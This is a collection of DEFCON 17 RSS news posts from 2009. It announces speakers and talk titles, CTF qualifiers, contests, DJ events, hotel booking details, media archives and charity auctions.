https://www.defcon.org/defconrss.xml Dark Tangent has been busy this past weekend, re-encoding the Audio from DEFCON 1 through 6 into iPod friendly m4b format! While he was at it, he decided to also re-encode the Hacker Documentaries in the archives to m4v format for your viewing pleasure! The audio from 1-6 can also be downloaded straight from iTunes! Also check out media.defcon.org for peer-to-peer links and links to all of the past media we're working on! DEFCON 1 Audio Links | DEFCON 1 Audio RSS DEFCON 2 Audio Links | DEFCON 2 Audio RSS DEFCON 3 Audio Links | DEFCON 3 Audio RSS DEFCON 4 Audio Links | DEFCON 4 Audio RSS DEFCON 5 Audio Links | DEFCON 5 Audio RSS DEFCON 6 Audio Links | DEFCON 6 Audio RSS Re-encoded Hacker Documentaries Hacker Documentary - 1994 - Unauthorized Access by Annaliza Savage Hacker Documentary - 1995 - Hackers 95 by Phon-E and R.F. Burns Hacker Documentary - 1997 - Hacks by Christine Bader Hacker Documentary - 2000 - Commodore 64 Cracks by Iron Feather

==> DJ Event Videos from DEFCON 17!

https://www.defcon.org/defconrss.xml For your visual and auditory pleasure, check out the following videos of the fantastic sets recorded from some of the DJ Events at DEFCON 17! Special thanks to Liquid8or for recording and providing these videos! Download and enjoy! Corrupt Data DJ Njntrubl - End of BW Ball DJ Felix 1 - Pool Party DJ Felix 2 - Pool Party DJ Felix Mix DJ Great Scott 1 - BW Ball DJ Great Scott 2 - BW Ball DJ Great Scott 3 - BW Ball DJ Great Scott 4 - BW Ball DJ Great Scott and Sailor Gloom - BW Ball DJ Jackalope - BW Ball DJ Jackalope - End of BW Ball DJ Kricz Klink - BW Ball DJ Pepse - Pool Party DJ Pepse and Felix - Pool Party DJ Reeves - NSB DJ Sailorgloom and Kricz Klink - BW Ball DJ Simo Sleevin - NSB DJ Simo Sleevin and Scritch - NSB DJ Undecided 1 - BW Ball DJ Undecided 2 - BW Ball DJ Undecided 1 - NSB DJ Undecided 2 - NSB DJ Undecided and Jackalope - BW Ball Video from NSB 1 Kricz Klink and Njntrubl - BW Ball DJ Jackalope Mix Clip

==> DEFCON 17 Early Release Videos!

https://www.defcon.org/defconrss.xml Check out some of the hot presentations from DEFCON 17! We'll be releasing all of the videos for free a few months out, but for now we've chosen a few we think you might enjoy! If you'd like to purchase the entire DVD collection of the DEFCON 17 presentations, you can do so at The Source of Knowledge website. Failure Adam Savage Video | Audio "Smart" Parking Meter Implementations, Globalism, and You Joe Grand, Jake Appelbaum, and Chris Tarnovsky Video and Slides | Slides | Audio More Tricks for Defeating SSL Moxie Marlinspike Video and Slides | Slides | Audio The Day of the Updates Itzik Kotler and Tomer Bitton Slides | Audio Advancing Video Application Attacks with Video Interception, Recording, and Replay Jason Ostrom and Arjun Sambamoorthy Slides | Audio

==> DEFCON 17 CTF Packet Captures & Binaries Available!

https://www.defcon.org/defconrss.xml The DEFCON 17 CTF packet captures and binaries are now available via bittorrent. Enjoy!

==> DEFCON 17 Press Page Updated!

https://www.defcon.org/defconrss.xml Head on over to the DEFCON Press Page and check out the news from this year's show! You can also find the press listed on the DEFCON 17 Archives Page! If you've come across a good article on DEFCON 17 that you think should be up there, don't hesitate to send it to neil {at} defcon }dot{ org for posting!

==> DEFCON 17 Archives Page is Live!

https://www.defcon.org/defconrss.xml You can now peruse the DEFCON 17 Archives Page, which contains links to all of the presentation materials and code available, including all updated materials we have recieved! We'll have the printed program and press links up soon, and down the road you will be able to download all of the audio and video of the the talks for free! We're working on getting a few early release videos up next week to tide you over!

==> Upload all of your DEFCON 17 Photos to pics.defcon.org!

https://www.defcon.org/defconrss.xml Help to preserve and share those DEFCON 17 memories on pics.defcon.org! If you have a DEFCON Forums account, you already have a pics account, just use the same login information. While you're at it, submit your galleries to defconpics.org as well!

==> Follow the Post-Con discussion on the DEFCON Forums

https://www.defcon.org/defconrss.xml Get over to the DEFCON Forums to join in on the post-con buzz from DEFCON 17! You can find out what people thought, content links, and it's never to early weigh in on next year's show. Remember, DEFCON is <em>your</em> con, and the best way to get involved is to get in on the discussions posted at forum.defcon.org. Have an idea for a new contest or event? It's the best place to start!

==> Autographed, White "I Hack Charities" Shirts Listed on Ebay

https://www.defcon.org/defconrss.xml Up for Auction: THREE "I hack charities" White Signed T-ShirtS. All of the proceeds from these auctions except the ebay auction cost will be donated to "Hackers for charities" http://johnny.ihackstuff.com/ These Shirts were Signed by Most of the Big names at Defcon 17. Anyone that Attended may have seen these shirts displayed at the "Hackers for Charities" booth on sunday. Everyone online and at defcon has seen the Black "I hack charities" T-shirts. But not many have seen the white ones. Well that is because there were only 4 white shirts printed!! Johnny Long has 1 and the other 3 were all signed by the people below for these auctions. Each shirt is unique with the location of the signatures and the quotes written by the signers. These shirts were signed by: Johnny Long Dan Kaminsky Jeff "The Dark Tangent" Moss Kevin Mitnick Joe "$Kingpin$" Grand Bruce Potter Nikita Priest The Entire 2009 CTF winning team and many others. Listing URLs: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120458285523 http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120458285993 http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120458286499

==> DEFCON 17 Receipt Posted, Aaaand We're Spent...

https://www.defcon.org/defconrss.xml We'll we've made it back to our respective homes, with another awesome DEFCON on the books! We are now in recovery mode, and normal updating will resume next week! The DEFCON 17 Receipt of Admission is now posted! Thanks to all for making this a fantastic DEFCON!

==> Don't miss NIST's Hack the Quantum at DEFCON 17!

https://www.defcon.org/defconrss.xml Hack the Quantum Presented by the Joint Quantum Institute, National Institute of Standards and Technology and University of Maryland, and the Centre for Quantum Technologies, National University of Singapore With a hands-on Bell-o-meter for entangled photons you can convince yourself that there are quantum effects beyond classical physics: a real qubit is offered to the participant who achieves the strongest violation of a Bell inequality. We also present a fresh attack that breaks many current quantum crypto systems, and demonstrate a photon-based quantum randon number generator. Find it in Capri 114 /115 Friday-Sunday at DEFCON 17!

==> The Community Delivers Great Mobile Options for DEFCON 17!

https://www.defcon.org/defconrss.xml There has been an outpouring of mobile ready and mobile friendly options from the DEFCON community this year to make your DEFCON scheduling easier! First there is a full blown (and very cool) unofficial iPhone app that has been submitted to the Apple store for review, made by Johnnie "Jedi" Pittmann (@dtjedi) and Todd Kimball (@tkimball). As of this posting, This app is not yet available from the Apple store. They have opted, pending acceptance from Apple, to make the app available via ad-hoc distribution, and will be accepting requests by email until Wednesday, July 29th at 9am PDT. The method, contact info, and possible risks are clearly outlined at http://www.group6.net/AdHoc.html From their site on http://www.group6.net/Defcon_App.html: After years of misplaced, begged, borrowed, stolen Defcon schedules, we decided to do something to help. Introducing the Defcon 17 iPhone app. Get all the up to date details on the con on your iPhone/iPod Touch. In addition to that, you can view the offical Defcon RSS feed and #defcon Twitter posts. Talk and event calendars, speaker and dj bios, and a map of the venue. Features - Talk Calendar - Event Calendar - Speaker/DJ Biographies - Defcon RSS Feed Reader - Twitter #defcon Not to mention the great efforts of Darth Null to bring you an extremely useful web-based iPhone/mobile ready schedule and map application! You can find his fantastic work at http://www.darthnull.org. There are also a couple of Google calendars out there, one for events, thanks to JonM, and a full schedule at http://defcon.starthan.net/ All of these folks are coordinating together for updates, to bring you the freshest info from DEFCON 17! A huge thank you all of them for contributing!

==> Keep Up On What's Happening At DEFCON 17!

https://www.defcon.org/defconrss.xml You can go to the DEFCON Qik Feed or our Qik group and check out we and group members are doing at con! Use the #defcon hashtag on Twitter to search for and make defcon related tweets easier to find!

==> Metasploit Track at DEFCON 17!

https://www.defcon.org/defconrss.xml Check out all the Metasploit goodness you can absorb in the Metasploit Track at DEFCON 17! It all takes place Saturday in Track 2! 10:00 - 10:50 Breaking the "Unbreakable" Oracle with Metasploit Chris Gates & MC 11:00 - 11:50 Using Guided Missiles in Drive-Bys: Automatic browser fingerprinting and exploitation with Metasploit egypt 12:00 - 12:20 WMAP: Metasploit goes Web Efrain Torres 14:00 - 15:20 MetaPhish Val Smith, Colin Ames, David Kerb 15:30 - 16:00 MSF Telephony I)ruid 16:10 - 16:40 Metasploit Evolved, Meterpreter Advances, Hacking the Next Internet HD Moore 16:50 - 17:20 MSF Wifi Mike Kershaw 17:30 - 18:00 App Assessment the Metasploit Way David Maynor 18:10 - 18:40 Macsploitation with Metasploit Dino Dai Zovi 18:50 - 19:20 Metasploit Autopsy: Recontructing the Crime Scene Peter Silberman & Steve Davis

==> Badge Hacking Buzz!

https://www.defcon.org/defconrss.xml Check out the Badge Hacking Contest threads on the DEFCON Forums to see what everyone is talking about bringing/using to Hack the badge this year. It might give you some inspiration!

==> The Summit at DEFCON 17

https://www.defcon.org/defconrss.xml Don't forget to attend The SUMMIT Fund Raiser for the EFF (www.eff.org), 50+ Speakers attending, 3 Djs, VIP event, Monaco Tower (TOP FLOOR), Top of the RIV , 8:30pm Thursday Night. See Forum for more info. Add to your social calendar. $30/$15 Student.

==> DEFCON 17 Badge Pre-release Info!

https://www.defcon.org/defconrss.xml Joe Grand has posted some pre-release info on the DEFCON Forums to get you started for the badge hacking contest this year. Go check it out at: https://forum.defcon.org/showthread.php?t=10655

==> DEFCON 17 Events/Contests Posted on Schedule Page!

https://www.defcon.org/defconrss.xml The specific info for events and contests has been posted in the DEFCON 17 Schedule Page! If you have an event or contast that is not posted please send hours of operation and location to neil at defcon.org, and we'll get them up!

==> DEFCON 17 Google Calendar

https://www.defcon.org/defconrss.xml JonM has been so kind as to begin to start populating a Google calendar of the events for DEFCON 17! More events will be added as the times and locations come in!

==> DEFCON 17 CTF Quals Cartoon Write Up

https://www.defcon.org/defconrss.xml Check out this awesome write-up of the CTF Quals from one of the qualifying teams, the Sapheads! Clever and educational, it provides a great perspective on the thought processes behind solving the B300 section of the qualification round. Sounds like they plan to do more, so we'll keep an eye out! http://hackerschool.org/DefconCTF/17/B300.html

==> Hacker Jeopardy is Looking for Team Sign Ups

https://www.defcon.org/defconrss.xml From G Mark on the DEFCON Forums: THE PROPER (AND ONLY) WAY TO SIGN UP A TEAM FOR HACKER JEOPARDY Okay, just to make sure that everyone has an equal opportunity, here are the directions to sign up your team. Don't do something else (like post a reply to Winn's thread, since it might not get read in time -- we had this problem last year.) 1. Open an e-mail to "hackerjeopardy@gmail.com" 2. Include your TEAM NAME and the real names and handles of your three (3) team players. (Privacy policy: we protect your identity unless a Fed or someone with a whole bunch of cash wants it.) 3. Explain why you are 31337 enough to play this year. Brag like you're trying to get lucky. 4. Include at least one cellphone number so we can contact you to notify if you're playing or there's a problem with your entry. 5. Send the e-mail as soon as possible, but absolutely no later than 90 minutes before the scheduled start of the round to be played. In case of any dispute, you're wrong (unless you are an entity described in #2 above.)

==> Alternate slots for ninjas... LosT @ Con Mystery Challenge

https://www.defcon.org/defconrss.xml There are still alternate slots open for teams considering trying to register. There *may* be a way for alternate teams to knock teams from their spots on day one of the contest this year. Check out the official Mystery Challenge site at http://ten-five-seven.org

==> CannonBall Run is Back!

https://www.defcon.org/defconrss.xml The 5th Annual CannonBall Run is set to start Thursday July 30th 2009 with the fist car leaving at 11:00 AM. We will start in Redondo Beach and arrive yet again at the Riviera Hotel in Las Vegas, Nevada. website: http://moloch.org/cannonball/ DEFCON Forum: https://forum.defcon.org/forumdisplay.php?f=474 twitter: http://twitter.com/dccannonballrun qik: http://qik.com/tommee

==> Team Fortress 2 Tournament - Only Two Days Left to Sign Up for Quals!

https://www.defcon.org/defconrss.xml Qualifiers - July 17-18 Get your teams together and mark your calendar. Qualifiers will be the evenings of July 17-18. As teams sign up, we'll work with the team captains to finalize scheduling. Also, we'll group the individual reg's together into teams for the quals as well. If you haven't signed up, please do so sooner rather than later. NOTE you don't need a full team to sign up a team. If you've got 4 or 5 friends you want to play with, register a team and we'll fill the blanks up with individual reg's later. Sign up at: http://www.nomoose.org/dctf2/

==> Coffee Wars Call for Beans

https://www.defcon.org/defconrss.xml http://www.coffeewars.org/CallForBeans.shtml From shrdlu on the DEFCON Forums: Information for those hoping to win on our momentous Tenth Year of celebrating caffeine. You can submit your beans before Friday morning, by various arcane methods, none of which will be posted here (but email to Foofus might help). You *MUST* submit them before 10AM (or close to it), since that's when we start brewing and drinking and judging. We'll send the occasional messenger out into the massed and frightening horde if you are trying to bring it Friday morning. Coffee Wars only takes place on Friday morning. We're usually done by 11-ish, and vanished completely by Noon. You can spot most of the judges the rest of the day due to the slight vibration of their entire body (except me; I *like* that much caffeine).

==> DEFCON 17 Artwork Contest Winners!

https://www.defcon.org/defconrss.xml Congratulations to the winners of the DEFCON 17 Artwork Contest! People's Choice: "Watchmen Parody" by Mar T-shirt Category: "Floppy" by JesseK Poster Category: "DEFCON 17" by Steve Andrus Bumper Sticker Category: "Tailing The Elite Hacker" by downtownDB Honorable Mention goes out to "DT Has a Posse" by Mar! Thank you to all of the entrants for their great work!

==> DEFCON 17 Speaking Schedule is Live and Final Speakers are Posted!

https://www.defcon.org/defconrss.xml That's right! The DEFCON 17 Schedule is now live! It may experience a few minor changes before all is said and done, but it is pretty much good to go! Events will be posted on the schedule page as exact times roll in, so keep your eyes peeled for updates! If you are a speaker and see any discrepancies, pass them along to talks at defcon dot org. Go have a look, and while your at it, check out the last batch of awesome speakers we have lined up for you this year: Preparing for Cyber War: Strategy and Force Posture in the Information-Centric World Dmitri Alperovitch, Marcus Sachs, Phyllis Schneck and Ed Skoudis Hello, My Name is /hostname/ Endgrain, Dan Kaminsky and Tiffany Rad Dradis Framework - Sharing Information will get you Root etd 0-day, gh0stnet and the Inside Story of the Adobe JBIG2 Vulnerability Matt Richard and Steven Adair Three Point Oh. Johnny Long Reverse Engineering By Crayon: Game Changing Hypervisor Based Malware Analysis and Visualization Danny Quist and Lorie M. Liebrock Cracking 400,000 Passwords, or How to Explain to Your Roommate why the Power Bill is a Little High Matt Weir and Sudhir Aggarwal Catching DNS Tunnels with AI Jhind Perspective of the DoD Chief Security Officer Robert Lentz

==> Big Speaker Update on defcon.org! Adam Savage to speak at DEFCON 17!

https://www.defcon.org/defconrss.xml Check out the big old list of hotness on https://www.defcon.org, we have just added 39 more speakers to the site! There are only a few speakers yet to post, and the schedule is being webbified into a more mobile-friendly format (than past years) as we speak, so expect more updates in the next couple of days! You may have already heard on Twitter, it is our pleasure to officially announce that Adam Savage of MythBusters fame will be speaking this year at DEFCON! So get on over to defcon.org and check it all out, and remember to follow us on Twitter for updates as they occur!

==> Voting is Open for the DEFCON 17 Artwork Contest!

https://www.defcon.org/defconrss.xml Here's what you do: go to the DEFCON 17 Artwork Contest Gallery on pics.defcon.org and pick your favorite. Then head on over here and vote in the poll! The default display for the gallery is 12 items per page, so make sure you check out all 3 pages. There are 29 entries total. Good Luck to all the fantastic entries!

==> DEFCON 17 DJ pages are live!

https://www.defcon.org/defconrss.xml Check out the new DJ pages on the DEFCON 17 site! You can find line-ups for the Black & White bleep, Pool Parties, and daytime Chillout area! There are also artist bios and samples of the music you might encounter! It's all at https://www.defcon.org/html/defcon-17/dc-17-djs.html! And don't forget to follow the DEFCON Twitter feed for news as it happens, leading up to and during DEFCON 17!

==> Thursday Talks Line-up at DEFCON 17

https://www.defcon.org/defconrss.xml This year, we're packing even more goodness into Thursday's activities, with a half day of talks aimed at the DEFCON n00b. These talks will cover everything from basic hacking skills to what our beloved con is about, and how to get the most out of it. If you are new to DEFCON, or feel like you could get more out of it, this "basic training" will be an invaluable resource! DEFCON 101 HighWiz, The Dark Tangent, Russr, DJ Jackalope, Deviant Ollam, Thorn, ThePrez98, LosT, Siviak Pre-Con Introduction to Lock Picking Alek Amrani DEFCON 1 - A Personal Account Dead Addict Con Kung-Fu: Defending Yourself @ DEFCON Rob "Padre" DeGulielmo Hardware Black Magic - Building devices with FPGAs Dr. Fouad Kiamilev DCFluX in: The Man with the Soldering Gun Matt Krick "DCFluX" Effective Information Security Career Planning Lee Kushner and Mike Murray DC Network Session Lockheed So You Got Arrested in Vegas... Jim Rennie Hacking with GNURadio Videoman

==> Mystery Challenge Registration Update

https://www.defcon.org/defconrss.xml
Mystery Challenge Registration Update Congratulations to the following teams: 1. Team Silverlock 2. Team Psychoholics 3. Team Kuro 4. MobileDisco 5. Team Render 6. Team Security Catalyst 7. Team Lords of Failure 8. DEADC0DE 9. Team America (@#$& YEAH!) There are still a few slots available. Are YOU up to the challenge? 1o57

==> Even More DEFCON 17 Speaker Updates!

https://www.defcon.org/defconrss.xml Yes folks, yet another batch of great talks has been posted on the speaker page! That should do it for this week, but stay tuned next week for the last batches of talks to go up! Panel - Ask EFF: The Year in Digital Civil Liberties Kurt Opsahl, Jennifer Granick, Kevin Bankston, Fred von Lohmann, Marcia Hofmann and Peter Eckersley Panel - Meet the Feds 2009 The Middler 2.0: It's Not Just for Web Apps Anymore Jay Beale and Justin Searle Beckstrom's Law - A Model for Valuing Networks and Security Rod Beckstrom Sharepoint 2007 Knowledge Network Exposed Digividual Socially Owned in the Cloud Digividual Personal Survival Preparedness Steve Dunker and Kristie Dunker Social Zombies: Your Friends Want to Eat Your Brains Tom Eston and Kevin Johnson Cracking the Poor and the Rich: Discovering the Relationship Between Physical and Network Security Damian Finol FOE -- Feeding Controversial News to Censored Countries (Without Using Proxy Servers) Sho bleep Hardware Black Magic - Building devices with FPGAs Dr. Fouad Kiamilev Hack The Textbook Jon R. Kibler and Mike Cooper Advanced SQL Injection Joseph McCray Weaponizing the Web: New Attacks on User-generated Content Shawn Moyer and Nathan Hamiel Automated Malware Similarity Analysis Daniel Raygoza The Security Risks of Web 2.0 David Rook Proxy Prank-o-Matic Charlie Vedaa and "Anonymous secondary speaker"

==> CTF Quals Are Over, But There are Other Bases to Belong

https://www.defcon.org/defconrss.xml The CTF Quals round has ended! DEFCON congratulates the qualifying teams! From ddtek.biz: Qualified teams: 1. sk3wlm4st3r (CONFIRMED! as sk3wl0fr00t) 2. Team Awesome (aka VedaGodz) (CONFIRMED!) 3. Sexy Pwndas (unconfirmed) 4. PLUS (unconfirmed) 5. Shellphish (CONFIRMED!) 6. Song of Freedom (CONFIRMED!) 7. lollerskaterz dropping from roflcopters (CONFIRMED!) 8. Underminers (unconfirmed) 9. Routards (CONFIRMED!) 10. WOWHACKER (CONFIRMED!) alt. Sapheads_ (CONFIRMED!) alt. sutegoma (CONFIRMED!) alt. CLiP (unconfirmed) alt. pebkac (unconfirmed) alt. ACMEPharm (unconfirmed) If you didn't make it and still want a mind bending challenge at DEFCON this year, there a few slots left in LosT's Mystery Challenge, so wrangle up a team and get to ten-five-seven.org to find clues on how to enter! Open CTF will also be back this year, bigger and badder than ever if you need that attack/defend goodness!

==> DEFCON 17 Speaker Update

https://www.defcon.org/defconrss.xml Here are a few more talks to keep you going! We have a bunch more coming through the end of the week, so stay tuned. Follow the DEFCON Twitter Feed for announcements as they are posted! BitTorrent Hacks Michael Brooks and David Aslanian Unfair Use - Speculations on the Future of Piracy Dead Addict DEFCON 1 - A Personal Account Dead Addict Con Kung-Fu:Defending Yourself @ DEFCON Rob "Padre" DeGulielmo Router Exploitation FX Jackpotting Automated Teller Machines Barnaby Jack Something about Network Security Dan Kaminsky Malware Freak Show Nicholas J. Percoco and Jibran Ilyas That Awesome Time I Was Sued For Two Billion Dollars Jason Scott Good Vibrations: Hacking Motion Sickness on the Cheap Tottenkoph

==> DEFCON 17 News

https://www.defcon.org/defconrss.xml Keep your eyes on the DEFCON 17 site for a page coming soon that will give you the lowdown on all the great DJ's that will spin at DEFCON this year. We'll have pics and bios, as well as sample tracks for download! Also, due to the great number of awesome talks we're accepting in the 1200 second spotlight, we've decided to make a fifth track for turbo/breakout talks! So keep watching for more updates, and as always, You can follow the DEFCON Twitter feed for links to the info as it's posted!

==> DEFCON 17 CFP Update

https://www.defcon.org/defconrss.xml If you submitted a CFP and have not been notified of it's status hold tight! We have a lot of submissions this year that we want to accept. If you haven't heard back from us by now, you're still in consideration for a time slot. We're probably trying to find room for you. Sorry we missed our June 1st notification date, but we have too much awesome sauce for our burgers. An update will be posted to the website when we have finished our selection process, all CFP's will be sent an email of their status at that point. Thanks!

==> Thursday (July 30th) at DEFCON 17

https://www.defcon.org/defconrss.xml In the past, we have usually opened up registration and swag midday Thursday for those early birds that want to get a jump on things before the con officially starts. There are also a few unofficial events and gatherings, like the Toxic BBQ and theSummit, that make Thursday almost an extra day of DEFCON. This year, we're packing even more goodness into Thursday's activities, with a half day track of talks aimed at the DEFCON newb. These talks will cover everything from basic hacking skills to what our beloved con is about, and how to get the most out of it. If you are new to DEFCON, or feel like you could get more out of it, this "basic training" will be an invaluable resource! In addition, the Chill Out Area will be open for hanging out and the infamous DEFCON wireless network will be up and running, so you can pwn or be pwned right out of the gate! Stay tuned for a complete listing of all the great talks planned for Thursday, and as always, you can get instant updates as they occur by following the DEFCON Twitter feed!

==> DEFCON 17 Mystery Challenge Update

https://www.defcon.org/defconrss.xml LosT can neither confirm nor deny that registration is currently open for the LosT@Con Mystery Challenge. See Ten-Five-Seven.org for updates. Kuni welcomes you to the wheel of fish.

==> Updates and Reminders for DEFCON 17

https://www.defcon.org/defconrss.xml Riviera Rooms: Be sure to book your room for this year's DEFCON! The Riviera is offering a DEFCON 17 special room rate of $89/night for 1-2 guests, add $20/night for guests 3-4. Hurry, space is limited, and our block usually sells out early! New DJ Organizer: Welcome to DJ Great Scott, who has accepted the mantle of DJ organizer for DEFCON 17. He will be the overlord of the Black and White bleep and the Poolside DJ action! Get ahold of him on the Forums (greatscott) or at blackandwhitedjs@gmail.com if you want to spin! Capture the Flag: CTF Quals Registration ends 6/4/09! Get your teams together and get in there! Register at: http://ddtek.biz/ctf/register.html Artwork Contest: Only about 2 weeks left in the DEFCON 17 Artwork Contest! Make some hacker art and win fabulous prizes (like free entry to DEFCON 17 and swag!) Rules posted at: https://www.defcon.org/html/defcon-17/dc-17-artwork-contest.html Contest & Events: Check out the Contests and Events section of the forums to see what's new! TommEE Pickles has resurrected the CannonBall Run, there's a new game called the 10,000 Cent Hacker Pyramid, and Coffee Wars is having it's 10th birthday! Extended hours at the pool mean Pool Party! As always, follow the DEFCON Twitter for all the announcements as they occur!

==> New DEFCON Tools Page is Live!

https://www.defcon.org/defconrss.xml Check out the DEFCON Tools page, a new section of the archives that collects the innovative tools released at DEFCON talks over the years! We currently have a list of the tools released at DEFCON 16, and are working backward to archive the tools from past shows. Special thanks to Mubix (aka Rob Fuller), of room362.com, for graciously collecting and writing up this content! All the tools Mubix could find are archived on the DEFCON media server. If you have access to a tool that is not locally stored, let us know at neil [at] defcon ]dot[ org and we'll get it up there!

==> More Talks for DEFCON 17!

https://www.defcon.org/defconrss.xml Here's another great round of talks to get you excited for DEFCON 17! DefCon 101 HighWiz, The Dark Tangent, Russr, DJ Jackalope, Deviant Ollam, Thorn, ThePrez98, Lost, Siviak Session Donation Alex Amrani Sniff Keystrokes With Lasers/Voltmeters - Side Channel Attacks Using Optical Sampling Of Mechanical Energy And Power Line Leakage Andrea Barisani and Daniele Bianco Hijacking Web 2.0 Sites with SSLstrip--Hands-on Training Sam Bowne Attacking SMS. It's No Longer Your BFF Brandon Dixon Breaking the "Unbreakable" Oracle with Metasploit Chris Gates and Mario Ceballos Injectable Exploits: Two New Tools for Pwning Web Apps and Browsers Kevin Johnson, Justin Searle and Frank DiMaggio eXercise in Messaging and Presence Pwnage Ava Latrope Defcon Security Jam 2: The Fails Keep on Coming David Mortman Hacking Sleep: How to Build Your Very Own Sleep Lab Ne0nRa1n and Keith Biddulph RFID MythBusting Chris Paget Search And Seizure Explained - They Took My Laptop! Tyler Pitchford, Esq. Fragging Game Servers Bruce Potter and Logan Lodge Hackerspaces: The Legal Bases RogueClown Debaze - A Remote Method Enumeration Tool for Flex Servers Jon Rose Bluetooth, Smells Like Chicken. Dominic Spill, Michael Ossmann and Mark Steward "I Am Walking Through a City Made of Glass and I Have a Bag Full of Rocks" (Dispelling the Myths and Discussing the Facts of Global Cyber-Warfare) Jayson Street Dangerous Minds: The Art of Guerrilla Data Mining Mark Ryan Del Moral Talabis Follow us on Twitter!

==> DEFCON 17 Speaker Update!

https://www.defcon.org/defconrss.xml The CFP is now closed and selection is in full swing! Check out the latest batch of talks selected for DEFCON 17! Unmasking You Joshua D. Abraham and Robert Hansen Confidence Game Theater cough Death of Anonymous Travel Sherri Davidoff Using Guided Missiles in Drive-Bys: Automatic browser fingerprinting and exploitation with Metasploit Egypt "Smart" Parking Meter Implementations, Globalism, and You (aka Meter Maids Eat Their Young) Joe "Kingpin" Grand, Jake Appelbaum, and Chris Tarnovsky The Psychology of Security Unusability Peter Gutmann Effective Information Security Career Planning Lee Kushner and Mike Murray Abusing Firefox Addons Roberto Suggi Liverani and Nick Freeman Clobbering the Cloud Haroon Meer and Marco Slaviero RAID Recovery: Recover your bleep by Sight and Sound Scott Moulton Protecting Against and Investigating Insider Threats (A methodical, multi-pronged approach to protecting your organization) Antonio "Tony" Rucci PLA Information Warfare Development Timeline and Nodal Analysis Zulu Meet Be sure to follow the DEFCON Twitter Feed for speaker updates and other announcements as they occur!

==> Notice to DEFCON 17 CFP Submitters

https://www.defcon.org/defconrss.xml This is just a general reminder, we want to make sure all the submissions sent to us get a fair shot and are reviewed equally. We don't want any submissions missed so we send you an email to let you know it arrived safely. You should receive an acknowledgment of your submission within 48 hours after you have submitted. If you have not received an email from us, please resend your submission to talks at defcon dot org.

==> DEFCON 17 CFP Extended over Weekend!

https://www.defcon.org/defconrss.xml That's right slackers, you now have until Monday, May 18th to turn in your DEFCON CFP Submission! We want your insightful and interesting research to make it to the DEFCON 17 Stage! So get on it, what are you doing reading this? Go work on your submission! You can read the submission rules and get the CFP form at: https://www.defcon.org/html/defcon-17/dc-17-cfp.html

==> DEFCON 17 Talks Update

https://www.defcon.org/defconrss.xml Here are a few more of the talks chosen for DEFCON 17 to whet your appetite: Why Tor is Slow, and What We're Doing About It Roger Dingledine Managed Code Rootkits - Hooking into Runtime Environments Erez Metula Maximum CTF: Getting the Most Out of Capture the Flag Psifertex Hacking, Biohacking, and the Future of Humanity Richard Thieme As always, we will be posting these talks as they are chosen, so keep your eyes on the speakers page! Better yet, follow the DEFCON Twitter Feed for up to the minute notification of new talks, and all of the announcements relating to DEFCON 17!

==> The Mystery Challenge Has a New Home! Team Registration Opening Soon!

https://www.defcon.org/defconrss.xml The much loved and anticipated LosT@Con Mystery Challenge has a new home on the web at https://ten-five-seven.org! LosT informs us that team registration for this year's challenge will be opening soon, so keep your eyes peeled on the new site, and on the Mystery Challenge Forum on the DEFCON Forums for all the details on how to enter and for clues relating to the challenge!

==> DEFCON 17 Artwork Contest is Open!

https://www.defcon.org/defconrss.xml It's that time again, art ninjas! Whip out your favorite medium and get to creating, because the official DEFCON 17 Artwork Contest is now underway, and will run now to June 15, 2009. The goal for this year's artwork contest is to create a piece of art you would see plastered on a wall, mailbox, telephone pole or bumper of a car of the nearest urban center. What we're looking for is an underground feel, reminiscent of DIY 'zines, gig posters, or pulp comics... (Read on)

==> More DEFCON 17 Talks Selected!

https://www.defcon.org/defconrss.xml Speaker selection is underway, here are a few of the chosen talks! Expect more early to mid next week! Win at Reversing: Tracing and Sandboxing through Inline Hooking Nick Harbour Computer and Internet Security Law - A Year in Review 2008 - 2009 Robert Clark Making Fun of Your Malware Michael Ligh & Matthew Richard De Gustibus, or Hacking your Tastebuds Sandy Clark "Mouse" Hacking UFOlogy 102: The Implications of UFOs for Life, the Universe, and Everything Richard Thieme For all of the latest updates as they occur, be sure to follow us on Twitter at https://twitter.com/_defcon_

==> DEFCON 17 Site and First Round of Speakers are Live!

https://www.defcon.org/defconrss.xml The first round of speakers have been chosen with another to follow soon! You can check them out on the DEFCON 17 site, which is now live and will contain all the info for this year's con!

==> The Riviera - Good Changes for DEFCON 17

https://www.defcon.org/defconrss.xml This year at the Riv we'll see some nice changes to some of the pricing and policies of the hotel. Some initial RIV updates from the Dark Tangent on the DEFCON Forums: 1 - Room prices have been dropped to $89/Day and should be reflected here soon: http://www.rivierahotel.com/resnet/roomres.asp?ID=309 If you booked under the old prices I _think_ the pricing will automagically be reflected in your bill as the new room block price. 2 - We will get the pool to 11pm for swimming and hanging out. We can do low key DJ action till then. We are currently talking with them to determine how we can keep it longer. 3 - Drink prices on beer and booze have been reduced. I'll update this post when I have accurate information. We'll post more updates and details as they become available!

==> DEFCON 17 Booking Rate for the Riviera is Live

https://www.defcon.org/defconrss.xml Time to book those rooms for DEFCON 17. The Riviera has posted the booking info for this year's show. They are offering a rate of $102USD per night for 1-2 guests (add $20USD for additional guests up to 4). Note: The Nevada State Senate passed a law to increase room tax to 12% effective July 1, 2009. The tax increase will apply to all rooms occupied on and after July 1, 2009 regardless of when the reservation was made. You can acquire your room online at the following url: http://www.rivierahotel.com/resnet/roomres.asp?ID=309

==> DEFCON 17 CTF Qualifier announced dispite conficker

https://www.defcon.org/defconrss.xml FOR IMMEDIATE RELEASE 1 APRIL 2009 DEFCON CTF QUALIFIER ANNOUNCED Defense Diutinus Technologies Corp (ddtek) is pleased to announce the round of qualification for DEFON 17 CTF. The competition will be held on 5-7 June - without a stop, participants can be located everywhere. All are to play, but only the 9 best groups will be invited to join us in Las Vegas for the annual DEFCON ninja square off. We also intend to honour the code of the former CTF host and automatically qualify last years champion, the sk3wl of r00t (although we sincerely hope them to participate in qualifications). The qualification round will be in the style of game board, but answers need not be in the form of a question. Categories will require teams to demonstrate the superiority of hacking into a vast relm of security. You must be registered for participate. Registration site: http://ddtek.biz/ctf/register.html Registration opens: 01.04.2009 00:00:00 UTC Registration ends: 04.06.2009 00:00:00 UTC Qualifications open: 05.06.2009 23:00:00 UTC Qualifications ends: 07.06.2009 23:00:00 UTC More information that will follow via your registered email address. Bring all your l33t haxor skillz just leave your Kiddie toolz behind. Vulc@n Difensiva Senior Engineer Diuntinus Defense Technologies, Inc.

==> DEFCON CNN Interview

